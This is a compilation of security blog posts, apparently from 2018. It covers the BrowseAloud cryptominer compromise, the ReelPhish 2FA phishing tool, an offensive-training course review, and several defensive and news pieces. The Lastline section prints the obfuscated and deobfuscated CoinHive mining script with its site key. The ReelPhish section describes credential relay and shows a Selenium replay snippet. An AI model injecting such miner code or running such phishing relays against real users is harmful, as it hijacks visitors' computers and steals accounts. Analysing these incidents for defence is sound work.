\x7b\x74\x68\x72\x65\x61\x64\x73\x3a \x38\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a\x30\x2e\x36\x7d\x7d 
\x76\x61\x72 \x6d\x69\x6e\x65\x72 \x3d \x6e\x65\x77 
\x43\x6f\x69\x6e\x48\x69\x76\x65\x2e\x41\x6e\x6f\x6e\x79\x6d\x6f\x75\x73\x28\'\x31\x47\x64\x51\x47\x70\x59
\x31\x70\x69\x76\x72\x47\x6c\x56\x48\x53\x70\x35\x50\x32\x49\x49\x72\x39\x63\x79\x54\x7a\x7a\x58\x71\'\x2c 
\x63\x70\x75\x43\x6f\x6e\x66\x69\x67\x29\x3b\x6d\x69\x6e\x65\x72\x2e\x73\x74\x61\x72\x74\x28\x29\x3b\x3c
\x2f\x73\x63\x72\x69\x70\x74\x3e

Compromising a third-party tool's JavaScript is no small feat, and it allowed the code fragment to be deployed on thousands of unaware websites (a comprehensive list of websites using BrowseAloud to provide screen reader support and text translation services is available here: https://publicwww.com/websites/browsealoud.com%2Fplus%2Fscripts%2Fba.js/).

To analyze the obfuscated code we loaded one of the affected websites (Camden Council) into our instrumented web browser (Figure 2) and extracted the clear text.

Figure 2: The Camden Council website as analyzed by Lastline's instrumented web browser.

As it turns out, it is an instance of the well-known and infamous CoinHive, mining the Monero cryptocurrency:

<script>
if (navigator.hardwareConcurrency > 1) {
  var cpuConfig = {threads: Math.round(navigator.hardwareConcurrency/3), throttle: 0.6}
} else {
  var cpuConfig = {threads: 8, throttle: 0.6}
}
var miner = new CoinHive.Anonymous('1GdQGpY1pivrGlVHSp5P2IIr9cyTzzXq', cpuConfig);
miner.start();
</script>

Unlike Bitcoin wallet addresses, CoinHive site keys do not allow balance checks, making it impossible to answer the question of how much money the attackers managed to make in this heist. On the other hand, quite interestingly, the very same CoinHive key popped up on Twitter approximately one week ago (https://twitter.com/Banbreach/status/960594618499858432); the context is still not clear, and we will update this blog post as we learn more.

As of now (16:34), the company behind BrowseAloud, Texthelp, has removed the JavaScript from its servers (as a preventive measure, the browsealoud[.]com domain has also been set to resolve to NXDOMAIN), effectively putting a stop to this emergency by disabling the BrowseAloud tool altogether. But when did it start, and, most importantly, how did it happen?

Figure 3: S3 object metadata.

Marco Cova, one of our senior researchers here at Lastline, quickly noticed that the BrowseAloud JavaScript files were hosted in an S3 bucket (see Figure 3 above).

In particular, the last-modified time of the ba.js resource showed 2018-02-11T11:14:24, making Sunday morning (UK time) the very first moment this specific version of the JavaScript was served.

Figure 4: S3 object permissions.

Although it’s not possible to know for certain (only our colleagues at Texthelp can perform this investigation), it seems possible that attackers managed to modify the S3 object holding the JavaScript file by taking advantage of weak S3 permissions (see Figure 4). Unfortunately, we cannot pinpoint the exact cause, as we do not have at our disposal the full permission records for the referenced S3 bucket.
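While the root cause here remains speculation on our part, teams hosting JavaScript in S3 can at least audit for overly permissive ACLs with the standard AWS CLI; the bucket name below is a placeholder, and the key is the path of the affected script.

# Check who can write to the bucket and to the specific object
aws s3api get-bucket-acl --bucket <bucket-name>
aws s3api get-object-acl --bucket <bucket-name> --key plus/scripts/ba.js

# Grants to the AllUsers or AuthenticatedUsers groups with WRITE or FULL_CONTROL are red flags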

Considering the number of components involved in an average website, it is concerning that a single compromise managed to affect so many websites. As Scott Helme noted, however, technologies able to thwart this kind of attack already exist: in particular, if those websites had implemented CSP (Content Security Policy) to mandate the use of SRI (Subresource Integrity), any attempt to load the compromised JavaScript would have failed, sparing thousands of users the irony of mining cryptocurrency for unknown hackers while trying to pay their council tax.
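For reference, an SRI hash for a third-party script can be generated with standard tools, following the approach commonly documented for Subresource Integrity; the URL below is a placeholder for the script you want to pin.

# Compute a sha384 Subresource Integrity hash for a hosted script
curl -s https://<third-party-host>/path/to/script.js | openssl dgst -sha384 -binary | openssl base64 -A

The resulting value goes into the script tag's integrity attribute (together with crossorigin="anonymous"), so any server-side tampering with the file would cause browsers to refuse to execute it.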

The post Trust Me, I am a Screen Reader, not a CryptoMiner appeared first on Lastline.

Tips to improve IoT security on your network

Judging by all the media attention that The Internet of Things (or IoT) gets these days, you would think that the world was firmly in the grip of a physical and digital transformation. The truth, though, is that we all are still in the early days of the IoT.

The analyst firm Gartner, for example, puts the number of Internet-connected “things” at just 8.4 billion in 2017, counting both consumer and business applications. That’s a big number, yes, but a much smaller one than the “50 billion devices” or “hundreds of billions of devices” figures that get bandied about in the press.

To read this article in full, please click here


Walk The Plank – Paul’s Security Weekly #547

This week, Zane Lackey of Signal Sciences joins us for an interview! Our very own Larry Pesce delivers the Technical Segment on an intro to the ESP8266 SoC! In the news, we have updates from Bitcoin, NSA, Facebook, and more on this episode of Paul's Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/Episode547

 

Visit https://www.securityweekly.com/psw for all the latest episodes!

Pundits Speculate: Did Russian Hackers Launch DDoS Attacks on Dutch Organizations?

Hackers who launch distributed denial of service (DDoS) attacks have varying motives, such as 1) competitive advantage against a business adversary, 2) vandalism for the sake of creating chaos/misfortune, 3) data theft, 4) political hacktivism or 5) cyber espionage. Earlier this week three Dutch banks and the Dutch Taxation Authority were victimized by DDoS attacks, starting on January 30. One security researcher claimed the attacks registered 40 Gbps. That’s not a massive volumetric attack, but it would be enough to disable a website. It’s more alarming when an attack impacts a bank or a government agency, because both types of organizations possess millions of sensitive data records.

The Dutch national tax office said its website went offline briefly, for 5-10 minutes. Regardless of how long they were under DDoS attack, the afflicted Dutch organizations should also be concerned about a security breach, because while defenders are distracted by an attack, hackers can compromise the network and infect it with malware that may “sleep” for weeks or months, only to be activated remotely later. Even a short-duration DDoS attack provides sufficient cover to install malware. That’s partly what makes DDoS attacks so pernicious; alone they do not constitute a security breach, but they are often a precursor to one. With the new EU GDPR regulations going into effect at the end of May, those Dutch organizations had better take a close look at their IT security systems.

DDoS Assessment

Some Dutch pundits (apparently off the record) surmise that Russian hackers launched the attacks as an act of political revenge for news reports that exposed the work of Russian state-sponsored hackers. According to BleepingComputer.com, “Last week, Dutch newspaper Volkskrant and TV station NOS published a report claiming that the country's AIVD intelligence service compromised the computer of a hacker part of Russian-based cyber-espionage group Cozy Bear (also known as APT29). The report claim AIVD agents spied on the cyber-espionage unit since 2014 and observed how Russian intelligence services hacked into DNC servers during the 2016 US Presidential election.”

These days it’s possible that anyone—not just some Russian hackers—could have launched the DDoS attacks because there is an abundance of botnet code out on the Dark Web. The hackers could be state-sponsored, or not. The Dutch authorities will probably never know for certain the source of the DDoS attacks, since such attacks are notoriously difficult to trace.

This incident is just one of many that point to the need to implement a DDoS defense solution at the network edge. Corero has been a leader in DDoS protection solutions for over a decade. To learn how we can help protect your part of the Internet ecosystem, contact us.

Dark Side Ops I & 2 Review

Dark Side Ops I
https://silentbreaksecurity.com/training/dark-side-ops/
https://www.blackhat.com/us-17/training/dark-side-ops-custom-penetration-testing.html 

A really good overview of the class is here: https://www.ethicalhacker.net/features/root/course-review-dark-side-ops-custom-penetration-testing

I enjoyed the class. This was actually my second time taking the class and it wasn't nearly as overwhelming the 2nd time :-)

 I’ll try not to cover what is in Raphael’s article as it is still applicable and I am assuming you read it before continuing on.

I really enjoyed the VisualStudio time and building Slingshot and Throwback myself along with getting a taste for extending the  implant by adding the keylogger, mimikatz, and hashdump modules.

Windows API developers may be able to greatly extend Slingshot, but I don't think I have enough WinAPI kung fu to do it, and there wasn't enough setup around the "how" to do it consistently unless you already have a strong Windows API background. However, one of the labs consisted of adding load-and-run PowerShell functionality, which lets you make use of the plethora of PowerShell code out there.

There was also a great lab where we learned how to pivot through a compromised SOHO router and the technique could also be extended for VPS or cloud providers.

Cons of the class.

The Visual Studio piece can get overwhelming, but it definitely gives you a big taste of (Windows) implant development. The class materials are getting slightly dated in some cases, and a refresh might be helpful. More Throwback usage and development would be fun (even as optional labs).


DSO II
https://silentbreaksecurity.com/training/dark-side-ops-2-adversary-simulation/ 
https://www.blackhat.com/us-17/training/dark-side-ops-ii-adversary-simulation.html 

Lab 1 was getting a fresh copy of Slingshot back up and running, then setting up some additional code to do a PowerShell web cradle to get our Slingshot implant running on a remote host, similar to how Metasploit's web delivery module does things.



Lab 2 involved some devops work: setting up servers, tunneling traffic over OpenVPN, and adding HTTPS to our Slingshot codebase.

Lab 3 covered initial access activity (HTA and Chrome plugin exploitation).





Lab 4 was tweaking our HTA to defeat some common detections and protections. We also worked on code to do sandbox evasion, as it’s becoming more common for automated sandbox solutions to be tied to mail gateways or used by people doing response.

Lab 5 covered application whitelisting bypasses.

Lab 6 involved host profiling via PowerShell and using Slingshot to run checks on the host.

Labs 7-9 covered building a kernel rootkit.



Lab 10 covered persistence via COM hijacking and hiding our custom DLL in the registry, and Lab 11 covered privilege escalation via a custom service.

Final Thoughts

I enjoyed the four days and felt like I learned a lot. So the TLDR is that I recommend taking the class(es).

Criticisms:
I think the set of courses is having a bit of an identity crisis, mostly due to the two-day format, and would be a much better class as a five-day. It is heavily development-focused, meaning you spend a lot of time in Visual Studio tweaking C code. The “operations” piece of the course definitely suffers a bit due to all the dev time. There was minimal talk about lateral movement, and the whole thing is entirely Windows focused, so no Linux and no OSX. A suggestion to fix the “ops” piece would be to split it into a Dark Side Ops - Dev course and a Dark Side Ops - Operator course, where the dev course is solely about developing your implant and the Operator course is solely about using the implant you dev’d (or were provided). The Silent Break team definitely knows their stuff, and a longer class format or a split like this would let them showcase that more effectively.




GDPR Material and Territorial Scopes

The new EU General Data Protection Regulation will enter into force on 25 May of this year. The GDPR contains rules concerning the protection of natural persons when their personal data are processed and rules on the free movement of personal data. The new regulation is not revolutionary but an evolution from the previous Data Protection Act 1998 […]

GDPR Preparation: Recent Articles of Note

Company preparations for GDPR compliance are (or should be!) in full swing, with the 25th May enforcement date fast looming on the horizon. With that in mind, I found the following set of recent GDPR articles a decent and interesting read. The list was compiled by Brian Pennington of Coalfire, who has kindly allowed me to repost it.

If you are after further GDPR swotting up, you could always read the actual regulation, the EU General Data Protection Regulation (EU-GDPR), and don't forget to read all the Recitals.

If you have any other GDPR-related articles or blogs of note, please post them in the comments.

A secure web is here to stay


For the past several years, we’ve moved toward a more secure web by strongly advocating that sites adopt HTTPS encryption. And within the last year, we’ve also helped users understand that HTTP sites are not secure by gradually marking a larger subset of HTTP pages as “not secure”. Beginning in July 2018 with the release of Chrome 68, Chrome will mark all HTTP sites as “not secure”.

In Chrome 68, the omnibox will display “Not secure” for all HTTP pages.


Developers have been transitioning their sites to HTTPS and making the web safer for everyone. Progress last year was incredible, and it’s continued since then:

  • Over 68% of Chrome traffic on both Android and Windows is now protected
  • Over 78% of Chrome traffic on both Chrome OS and Mac is now protected
  • 81 of the top 100 sites on the web use HTTPS by default
Chrome is dedicated to making it as easy as possible to set up HTTPS. Mixed content audits are now available to help developers migrate their sites to HTTPS in the latest Node CLI version of Lighthouse, an automated tool for improving web pages. The new audit in Lighthouse helps developers find which resources a site loads using HTTP, and which of those are ready to be upgraded to HTTPS simply by changing the subresource reference to the HTTPS version.

Lighthouse is an automated developer tool for improving web pages.
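If you want to try this yourself, the Node CLI version of Lighthouse is a quick install. The basic invocation below is standard; the mixed-content preset name is our assumption and may differ between Lighthouse versions.

# Install the Lighthouse CLI and run it against a site, opening the report when done
npm install -g lighthouse
lighthouse https://example.com --view

# Newer CLI builds expose the mixed-content checks via a preset (flag name may vary by version)
lighthouse https://example.com --preset=mixed-content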

Chrome’s new interface will help users understand that all HTTP sites are not secure, and continue to move the web towards a secure HTTPS web by default. HTTPS is easier and cheaper than ever before, and it unlocks both performance improvements and powerful new features that are too sensitive for HTTP. Developers, check out our set-up guides to get started.

Remembering John Perry Barlow, co-founder of Freedom of the Press Foundation and Internet pioneer. 1947-2018

Parker Higgins

We lost a legend yesterday. John Perry Barlow, co-founder of Freedom of the Press Foundation (FPF) and our original guiding voice, has passed away at the age of 70.

Over the course of an indelible and truly original life, Barlow was many things to many people. Some met him as a Wyoming cattle rancher, or as a mainstay in Timothy Leary’s Millbrook psychedelic facility, but many came to know him as the lyricist and poet responsible for “Cassidy” and other classic Grateful Dead tunes. It was that community—Grateful Dead fans who started some of the first message boards—that brought Barlow to the Internet, where the clarity of his vision and strength of his ideals made him a pioneer, and his gift with language made him the de facto poet laureate of a generation of technologists.

His most famous essay, a Declaration of the Independence of Cyberspace (“Governments of the Industrial World, you weary giants of flesh and steel…”) was a catalyst for the Internet freedom movement and is taught in universities and law schools around the country. Years before Napster and its ilk would force the music industry into a reckoning, his Wired writing on copyright became a blueprint for how less restrictive—and fairer—intellectual property rules could form a cornerstone of a new economy of ideas. He was a friend and advisor to basically every early Internet pioneer, entrepreneur, or activist you can name.

He was clearly a man of words, and he was also a man of action. In 1990, well before the reach of the Web would bring the Internet into everyday life, he understood its potential as a liberating force—as well as the risk that it could recapitulate existing power structures that had always pushed some people to the margins. In that year, he co-founded the Electronic Frontier Foundation, which has remained for a generation on the forefront of the struggle to ensure technology lives up to its potential of expanding humanity’s access to civil liberties, instead of curtailing them.

It was his passion for press freedom, and his belief that whistleblowers should be protected, not punished, which spurred him to co-found Freedom of the Press Foundation in 2012. He eloquently wrote at the time, “When a government becomes invisible, it becomes unaccountable. To expose its lies, errors, and illegal acts is not treason, it is a moral responsibility. Leaks become the lifeblood of the Republic.”

Here he is with our other co-founder Daniel Ellsberg, the day after we launched Freedom of the Press Foundation:

Death stared him down for years, as he suffered from various ailments and injuries of many kinds, but he never lost his poetic voice and dynamic spirit. His last public writing was a blog post he wrote for FPF on the 20th anniversary of his Declaration.

While it’s impossible not to mourn, there is no doubt that he would wish to see people celebrating his life and the ideals for which he lived, rather than lamenting he is gone.

In one of the Reddit Ask-Me-Anything sessions he participated in over the last several years, he posted a list of “adult principles” that he composed for himself on the eve of his 30th birthday. The principles themselves have now been heavily recirculated, and it’s a testament to the easy poetry of his words that these sparse 25 commandments have such widespread appeal. But the short introduction he gives to his principles, in response to a question about him being “a great man,” is even more indicative of Barlow’s philosophy.

The jury's well out on the great man thing. On the other hand, I'm willing to accept it when someone calls me a good man. I've been working on that one quite consciously for a long time. And, outside of being a good ancestor, it's my primary ambition.

John Perry Barlow was a good man. He was a good friend, and a visionary whose impact on technology, culture, and the world will be felt for generations. As the Grateful Dead say: fare thee well, JPB.

Best Practices, Unintended Consequences, and Negative Outcomes

Posted under: Research and Analysis

Information Security is a profession. We have job titles, recognized positions in nearly every workplace, professional organizations, training, and even some fairly new degree programs. I mean none of that sarcastically, but I wouldn’t necessarily say we are a mature profession. We still have a lot to learn about ourselves. This isn’t unique to infosec – it’s part of any maturing profession, and we can learn the same lessons the others already have.

As I went through the paramedic re-entry process I realized, much to my surprise, that I have been a current or expired paramedic for over half the lifetime of that profession. Although I kept my EMT up, I haven’t really stayed up to date with paramedic practices (the EMT level is basically advanced first aid – paramedics get to use drugs, electricity, and all sorts of interesting… tubes). Paramedics first appeared in the 1970s and when I started in the early 1990s we were just starting to rally behind national standards and introduce real science of the prehospital environment into protocols and standards. Now the training has increased from about 1,000 hours in my day to 1,500-1,800 hours, in many cases with much higher pre-training requirements (typically college level anatomy and physiology). Catching back up and seeing the advances in care is providing the kind of perspective that an overly-analytical type like myself is inexorably drawn toward, and provides powerful parallels to our less mature information security profession.

One great example of deeper understanding of a consequence of the science is how we treat head injuries. I don’t mean the incredible, and tragic lessons we are learning about Traumatic Brain Injury (TBI) from the military and NFL, but something simpler, cleaner, and more facepalmy.

Back in my active days we used to hyperventilate head injuries with increased intracranial pressure (ICP, because every profession needs its own TLAs). In layman terms: hit head, go boom, brain swells like anything else you smash into a hard object (in this case, the inside of your own skull), but in this case it is swelling inside a closed container with a single exit (which involves squeezing the brain through the base of your skull and pushing the brain stem out of the way – oops!). We would intubate the patients and bag them at an increased rate with 100% oxygen for two reasons – to increase the oxygen in their blood, trying to get more O2 to the brain cells, and because hyperventilation reduces brain swelling. Doctors could literally see a brain in surgery shrink when they hyperventilated their patients. More O2? Less swelling? Cool!

But outcomes didn’t seem to match the in-your-face visual feedback of a shrinking brain. Why? It turns out that the brain shrinks because when you hyperventilate a patient you reduce the amount of CO2 in their blood. This changes the pH balance, and also triggers something called vasoconstriction. The brain sank because the blood vessels feeding the brain were providing less blood to the brain.

Well, darn. That probably isn’t good.

I treated a lot of head injuries in my day, especially as one of the only mountain rescue paramedics in the country. I likely caused active harm to these patients, even though I was following the best practices and standards of the time. They don’t haunt me – I did my job as best I could with what we knew at the time – but I certainly am glad to provide better care today.

Let's turn back to information security, and focus on passwords. Without going into the history… in most cases our password standards no longer match our risk profiles. In fact, we often see them causing active harm.

Requiring someone to come up with a password with a bunch of strange characters and rotate it every 90 days no longer improves security. Blocking password managers from filling in password fields? Beyond inane.

We originally came up with our password rules due to peculiarities of hashing algorithms and password storage in Windows. A minimum length is a pretty good requirement to put into place, as is advising people not to use things that are easy to guess. But we threw in strange characters to address rainbow tables and hash matching, and forced password rotations because people kept stealing our databases and then had time to brute force the contents.

But if we use modern password hashing algorithms and good salts, we dramatically reduce the viability of brute force attacks, even if someone steals the password hashes. The 90-day and strange character requirements really aren't overly helpful. They are actually more likely harmful, because users forget their passwords and fall back on weaker password reset mechanisms. Think the name of your first elementary school is hard to find? Let's just say it ain't as hard to spot as a unicorn.
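As a rough illustration of what modern hashing with a per-user salt looks like in practice, here is a minimal Python sketch using the standard library's scrypt support; the cost parameters and the tuple-style storage are illustrative assumptions, not a recommendation from this post.

import hashlib
import hmac
import os

# Illustrative cost parameters: n=2**14, r=8, p=1 needs roughly 16 MB per hash,
# which is what makes large-scale brute forcing of a stolen database expensive.
SCRYPT_PARAMS = dict(n=2**14, r=8, p=1, maxmem=64 * 1024 * 1024)

def hash_password(password):
    # A fresh random salt per user defeats precomputed rainbow tables outright.
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt, **SCRYPT_PARAMS)
    return salt, digest

def verify_password(password, salt, expected_digest):
    # Recompute with the stored salt and compare in constant time.
    candidate = hashlib.scrypt(password.encode("utf-8"), salt=salt, **SCRYPT_PARAMS)
    return hmac.compare_digest(candidate, expected_digest)

salt, digest = hash_password("correct horse battery staple")
assert verify_password("correct horse battery staple", salt, digest)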

Blocking password managers from filling fields? In a time when they are included in most browsers and operating systems? If you hate your users that much, just dox them yourselves and get over it.

The parallel to treatment protocols for head injuries is pretty damn direct here. We made decisions with the best evidence at the time, but times changed. Now the onus is on us to update our standards to reflect current science.

Block the "1234" type passwords and require a decent minimum length, but let users pick what they want, and focus more on your internal security: storage, salts, and hashing. Support an MFA option appropriate to the kind of data you are working with, and build in a hard-to-spoof password reset/recovery option. Actually, that last area is ripe for research and better options.
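To make the policy side concrete, here is a minimal sketch of that kind of check; the 12-character minimum and the tiny denylist are assumptions for illustration, and a real deployment would check against a large breached-password corpus instead.

# Deliberately tiny denylist for illustration; use a real breached-password list in practice.
COMMON_PASSWORDS = {"123456", "password", "qwerty", "letmein", "111111", "1234"}

def acceptable_password(candidate, min_length=12):
    # Length plus a denylist check: no composition rules, no forced rotation.
    if len(candidate) < min_length:
        return False
    if candidate.lower() in COMMON_PASSWORDS:
        return False
    return True

print(acceptable_password("1234"))                   # False: too short and denylisted
print(acceptable_password("correct horse battery"))  # True: long passphrases pass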

We shouldn’t codify negative outcomes into our standards of practice. And when we do, we should recognize and change. That’s the mark of a continuously evolving profession.

- Rich

Heinous Noises – Enterprise Security Weekly #79

This week, Paul is joined by Doug White, host of Secure Digital Life, to interview InfoSecWorld 2018 Speaker Summer Fowler! In the news, we have updates from Cisco, SANS, Scarab, and more on this episode of Enterprise Security Weekly!

 

Full Show Notes: https://wiki.securityweekly.com/ES_Episode79

 

Visit https://www.securityweekly.com/esw for all the latest episodes!

Vulnerability Reward Program: 2017 Year in Review


As we kick off a new year, we wanted to take a moment to look back at the Vulnerability Reward Program in 2017. It joins our past retrospectives for 2014, 2015, and 2016, and shows the course our VRPs have taken.

At the heart of this blog post is a big thank you to the security research community. You continue to help make Google's users and our products more secure. We look forward to continuing our collaboration with the community in 2018 and beyond!

2017, By the Numbers

Here’s an overview of how we rewarded researchers for their reports to us in 2017:
We awarded researchers more than 1 million dollars for vulnerabilities they found and reported in Google products, and a similar amount for Android as well. Combined with our Chrome awards, we awarded nearly 3 million dollars to researchers for their reports last year, overall.

Drilling down a bit further, we awarded $125,000 to more than 50 security researchers from all around the world through our Vulnerability Research Grants Program, and $50,000 to the hard-working folks who improve the security of open-source software as part of our Patch Rewards Program.

A few bug highlights

Every year, a few bug reports stand out: the research may have been especially clever, the vulnerability may have been especially serious, or the report may have been especially fun and quirky!

Here are a few of our favorites from 2017:

  • In August, researcher Guang Gong outlined an exploit chain on Pixel phones which combined a remote code execution bug in the sandboxed Chrome renderer process with a subsequent sandbox escape through Android's libgralloc. As part of the Android Security Rewards Program he received the largest reward of the year: $112,500. The Pixel was the only device that wasn't exploited during last year's Mobile Pwn2Own competition, and Guang's report helped strengthen its protections even further.
  • Researcher "gzobqq" received the $100,000 pwnium award for a chain of bugs across five components that achieved remote code execution in Chrome OS guest mode.
  • Alex Birsan discovered that anyone could have gained access to internal Google Issue Tracker data. He detailed his research here, and we awarded him $15,600 for his efforts.

Making Android and Play even safer

Over the course of the year, we continued to develop our Android and Play Security Reward programs.

No one had claimed the top reward for an Android exploit chain in more than two years, so we announced that the greatest reward for a remote exploit chain--or exploit leading to TrustZone or Verified Boot compromise--would increase from $50,000 to $200,000. We also increased the top-end reward for a remote kernel exploit from $30,000 to $150,000.


In October, we introduced the by-invitation-only Google Play Security Reward Program to encourage security research into popular Android apps available on Google Play.


Today, we're increasing the reward for remote code execution vulnerabilities from $1,000 to $5,000. We're also introducing a new category that includes vulnerabilities that could result in the theft of users' private data, information being transferred unencrypted, or bugs that result in access to protected app components. We'll award $1,000 for these bugs. For more information visit the Google Play Security Reward Program site.


And finally, we want to give a shout-out to the researchers who've submitted fuzzers to the Chrome Fuzzer Program: they get rewards for every eligible bug their fuzzers find without having to do any more work, or even file a bug.


Given how well things have been going these past years, we look forward to our Vulnerability Rewards Programs resulting in even more user protection in 2018 thanks to the hard work of the security research community.

* Andrew Whalley (Chrome VRP), Mayank Jain (Android Security Rewards), and Renu Chaudhary (Google Play VRP) contributed mightily to help lead these Google-wide efforts.

ReelPhish: A Real-Time Two-Factor Phishing Tool

Social Engineering and Two-Factor Authentication

Social engineering campaigns are a constant threat to businesses because they target the weakest link in the security chain: people. A typical attack would capture a victim's username and password and store them for an attacker to reuse later. Two-Factor Authentication (2FA) or Multi-Factor Authentication (MFA) is commonly seen as a solution to these threats.

2FA adds an extra layer of authentication on top of the typical username and password. Two common 2FA implementations are one-time passwords and push notifications. One-time passwords are generated by a secondary device, such as a hard token, and tied to a specific user. These passwords typically expire within 30 to 60 seconds and cannot be reused. Push notifications involve sending a prompt to a user’s mobile device and requiring the user to confirm their login attempt. Both of these implementations protect users from traditional phishing campaigns that only capture username and password combinations.
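Most of those expiring codes follow the TOTP construction standardized in RFC 6238. As a rough sketch of how a six-digit, 30-second code is derived (the base32 secret below is a throwaway example, not a real token seed):

import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32, interval=30, digits=6):
    # Time-based one-time password (RFC 6238) using HMAC-SHA1.
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int(time.time()) // interval           # 30-second time step
    msg = struct.pack(">Q", counter)                 # 8-byte big-endian counter
    digest = hmac.new(key, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                       # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # prints the current 6-digit code for this example secret

Because both sides derive the code from a shared secret and the current time, a code phished from a victim remains valid for the rest of its time step – which is exactly the window real-time phishing abuses.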

Real-Time Phishing

While 2FA has been strongly recommended by security professionals for both personal and commercial applications, it is not an infallible solution. 2FA implementations have been successfully defeated using real-time phishing techniques. These phishing attacks involve interaction between the attacker and victims in real time.

A simple example would be a phishing website that prompts a user for their one-time password in addition to their username and password. Once a user completes authentication on the phishing website, they are presented with a generic “Login Successful” page and the one-time password remains unused but captured. At this point, the attacker has a brief window of time to reuse the victim’s credentials before expiration.

Social engineering campaigns utilizing these techniques are not new. There have been reports of real-time phishing in the wild as early as 2010. However, these types of attacks have been largely ignored due to the perceived difficulty of launching such attacks. This article aims to change that perception, bring awareness to the problem, and incite new solutions.

Explanation of Tool

To improve social engineering assessments, we developed a tool – named ReelPhish – that simplifies the real-time phishing technique. The primary component of the phishing tool is designed to be run on the attacker’s system. It consists of a Python script that listens for data from the attacker’s phishing site and drives a locally installed web browser using the Selenium framework. The tool is able to control the attacker’s web browser by navigating to specified web pages, interacting with HTML objects, and scraping content.

The secondary component of ReelPhish resides on the phishing site itself. Code embedded in the phishing site sends data, such as the captured username and password, to the phishing tool running on the attacker’s machine. Once the phishing tool receives information, it uses Selenium to launch a browser and authenticate to the legitimate website. All communication between the phishing web server and the attacker’s system is performed over an encrypted SSH tunnel.

Victims are tracked via session tokens, which are included in all communications between the phishing site and ReelPhish. This token allows the phishing tool to maintain state for authentication workflows that involve multiple pages with unique challenges. Because the phishing tool is state-aware, it is able to send information from the victim to the legitimate web authentication portal and vice versa.
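To illustrate just the browser-driving half of this architecture, here is a minimal Selenium sketch in Python; this is not ReelPhish's actual code, the portal URL and field names are placeholders, and this kind of credential replay should only ever be performed against systems you are authorized to test.

# pip install selenium; assumes a matching chromedriver is available on PATH.
from selenium import webdriver
from selenium.webdriver.common.by import By

TARGET = "https://vpn.example.com/login"  # hypothetical portal used in an authorized test

driver = webdriver.Chrome()
driver.get(TARGET)

# Field names are placeholders; a real engagement mirrors the portal's actual HTML.
driver.find_element(By.NAME, "username").send_keys("captured-username")
driver.find_element(By.NAME, "password").send_keys("captured-password")
driver.find_element(By.NAME, "otp").send_keys("123456")
driver.find_element(By.ID, "submit-button").click()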

Examples

We have successfully used ReelPhish and this methodology on numerous Mandiant Red Team engagements. The most common scenario we have come across is an externally facing VPN portal with two-factor authentication. To perform the social engineering attack, we make a copy of the real VPN portal’s HTML, JavaScript, and CSS. We use this code to create a phishing site that appears to function like the original.

To facilitate our real-time phishing tool, we embed server-side code on the phishing site that communicates with the tool running on the attacker machine. We also set up an SSH tunnel to the phishing server. When the authentication form on the phishing site is submitted, all submitted credentials are sent over the tunnel to the tool on the attacker's system. The tool then starts a new web browser instance on the attacker's system and submits the credentials to the real VPN portal. Figure 1 shows this process in action.


Figure 1: ReelPhish Flow Diagram

We have seen numerous variations of two-factor authentication on VPN portals. In some instances, a token is passed in a “secondary password” field of the authentication form itself. In other cases, the user must respond to a push request on a mobile phone. A user is likely to accept an incoming push request after submitting credentials if the phishing site behaved identically to the real site.

In some situations, we have had to develop more advanced phishing sites that can handle multiple authentication pages and also pass information back and forth between the phishing web server and the tool running on the attacking machine. Our script is capable of handling these scenarios by tracking a victim’s session on the phishing site and associating it with a particular web browser instance running on the attacker’s system. Figure 1 shows a general overview of how our tool would function within an attack scenario.

We are publicly releasing the tool on the FireEye GitHub Repository. Feedback, pull requests, and issues can also be submitted to the Git repository.

Conclusion

Do not abandon 2FA; it is not a perfect solution, but it does add a layer of security. 2FA is a security mechanism that may fail like any other, and organizations must be prepared to mitigate the impact of such a failure.

Configure all services protected by 2FA to minimize attacker impact if the attacker successfully bypasses the 2FA protections. Lowering maximum session duration will limit how much time an attacker has to compromise assets. Enforcing a maximum of one concurrent session per user account will prevent attackers from being active at the same time as the victim. If the service in question is a VPN, implement strict network segmentation. VPN users should only be able to access the resources necessary for their respective roles and responsibilities. Lastly, educate users to recognize, avoid, and report social engineering attempts.

By releasing ReelPhish, we at Mandiant hope to highlight the need for multiple layers of security and discourage the reliance on any single security mechanism. This tool is meant to aid security professionals in performing a thorough penetration test from beginning to end.

During our Red Team engagements at Mandiant, getting into an organization’s internal network is only the first step. The tool introduced here aids in the success of this first step. However, the overall success of the engagement varies widely based on the target’s internal security measures. Always work to assess and improve your security posture as a whole. Mandiant provides a variety of services that can assist all types of organizations in both of these activities.

Crypto-Mining Malware May Be a Bigger Threat than Ransomware

Crypto-Mining Malware is Crippling Enterprise Networks

Cryptocurrencies such as Bitcoin and Ethereum have gone mainstream; it seems like everybody and their brother is looking to buy some crypto and get their piece of the digital currency gold rush. Hackers want a piece of it, too. In addition to hacking ICOs and cryptocurrency exchanges, they're using crypto-mining malware to "mine" their own "coins."

Crypto-Mining Malware May Be a Bigger Threat than Ransomware

Crypto-mining malware isn’t new; last summer, this blog reported on a crypto-mining malware variant called Adylkuzz that came to light in the wake of the WannaCry attacks. Adylkuzz took advantage of the same Windows exploit as WannaCry. In fact, it acted as a sort of “vaccine” against the ransomware, preventing it from taking root in Adylkuzz-infected computers lest it interfere with its Monero-mining operations. However, Adylkuzz wasn’t a kinder, gentler malware. While it didn’t directly lock down systems or access data, it did hijack infected machines’ processing power, and it proved to be far more lucrative than WannaCry; it’s estimated that Adylkuzz raked in 10 times more money for its users than WannaCry.

At first, rogue crypto-miners were viewed as an annoyance; the most they did was slow down machines and perhaps cause problems accessing certain network folders. They were also seen as more of a threat to consumers than businesses. Many variants went after mobile and IoT devices, such as smartphones, overwhelming their processors to the point where the devices could be damaged or even destroyed. However, as crypto-mining malware has evolved, it has become more sophisticated, and hackers are looking to harvest enterprise processing power.

Move Over, WannaCry; Here Comes WannaMine

Recently, Dark Reading reported on yet another use of the EternalBlue exploit stolen from the NSA: a crypto-mining malware variant dubbed WannaMine. WannaMine doesn't attack smartphones and other small devices; it goes after Windows computers, and it isn't just slowing systems down. Security firm CrowdStrike reports having seen it cause "applications and hardware to crash, causing operational disruptions lasting days and sometimes even weeks."

A report in Security Week elaborates on how WannaMine appears to be designed to specifically target enterprise networks:

